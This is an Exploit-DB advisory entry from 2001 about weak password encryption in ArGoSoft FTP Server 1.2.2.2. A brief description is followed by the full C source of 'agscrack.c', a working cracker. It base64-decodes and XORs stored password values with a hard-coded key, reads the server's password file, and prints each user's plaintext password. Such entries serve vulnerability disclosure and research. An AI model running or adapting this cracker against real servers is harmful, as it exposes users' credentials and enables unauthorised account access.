ArGoSoft FTP Server 1.2.2.2 - Weak Password Encryption

EDB-ID:

21009


Author:

byterage

Type:

remote


Platform:

Windows

Date:

2001-07-12


// source: https://www.securityfocus.com/bid/3029/info

ArGoSoft FTP server is an FTP server for the Windows platform.

A design error exists in ArGoSoft FTP which enables an authenticated user to view other users encrypted passwords. However due to a weak encryption scheme it is possible for a user to decrypt the password using a third party utility. 

/********************************************************************

 * agscrack.c - ArGoSoft FTP Server 1.2.2.2 password file cracker   *

 * by [ByteRage] <byterage@yahoo.com> [http://www.byterage.cjb.net] *

 ********************************************************************/



#include <string.h>

#include <stdio.h>



int len; FILE *fh;



/* DECRYPTION ALGORITHMS */

unsigned char char2bin(unsigned char inbyte) {

  if ((inbyte >= 'A') && (inbyte <= 'Z')) { len++; return(inbyte-'A');
}

  if ((inbyte >= 'a') && (inbyte <= 'z')) { len++;
return(inbyte-'a'+26); }

  if ((inbyte >= '0') && (inbyte <= '9')) { len++; return(inbyte+4); }

  if (inbyte == '+') { len++; return('\x3E'); }

  if (inbyte == '/') { len++; return('\x3F'); }

  return('\x00');

}

void decode(unsigned char chars[], unsigned char bytes[]) {

  int i,retval=0;

  for(i=0; i<4; i++) { retval <<= 6; retval |= char2bin(chars[i]); }

  for(i=0; i<3; i++) { bytes[2-i] = retval & 0xFF; retval >>= 8; }

  len--;

}

void decryptpass(unsigned char encrypted[], unsigned char decrypted[])
{

  const unsigned char heavycrypt0[] =
"T3ZlciB0aGUgaGlsbHMgYW5kIGZhciBhd2F5LCBUZWxldHViYmllcyBjb21lIHRvIHBsYXk
=";

  unsigned int j, k=0, l;

  len = 0;

  for(j=0; j<strlen(encrypted); j+=4) {

    decode(&encrypted[j], &decrypted[k]);

    for(l=0; l<3; l++) { decrypted[k] ^= heavycrypt0[k++]; }

  }

  decrypted[len] = '\x00';

}

/* DECRYPTION ALGORITHMS END */



void main(int argc, char ** argv) {

  char password[128]; /* ArGoSoft's passwords don't get larger than 128
bytes */

  char buf[256]; char b;

  int rd;



  printf("ArGoSoft FTP Server 1.2.2.2 password file cracker by
[ByteRage]\n\n");

  if (argc<2) { printf("Syntax : %s <password(file)>\n", argv[0]);
return 1; }

  

  fh = fopen(argv[1], "rb");

  if (!fh) {

    decryptpass(argv[1], &password);

    printf("%s -> %s\n", argv[1], password);

    return 0;

  } else {

    /* simple password file processor */

    fread(&buf,1,1,fh);

    if (buf[0] == 4) {

      while (1) {

        if (fread(&b,1,1,fh) == 0) { break; }

        if (fread(&buf,1,b+1,fh) == 0) { break; }

        printf("%s : ", buf);

        b=0; while(!b) if (fread(&b,1,1,fh) == 0) { break; }

        if (fread(&buf,1,b+1,fh) == 0) { break; }

        decryptpass(&buf, &password);

        printf("%s -> %s\n", &buf, password);

        b=0; while(!b) if (fread(&b,1,1,fh) == 0) { break; }

        if (fread(&buf,1,b+1,fh) == 0) { break; }

        b=0; while(b!=4) if (fread(&b,1,1,fh) == 0) { break; }

      }

    } else printf("error when processing passwordfile!");

    fclose(fh);  

  }

}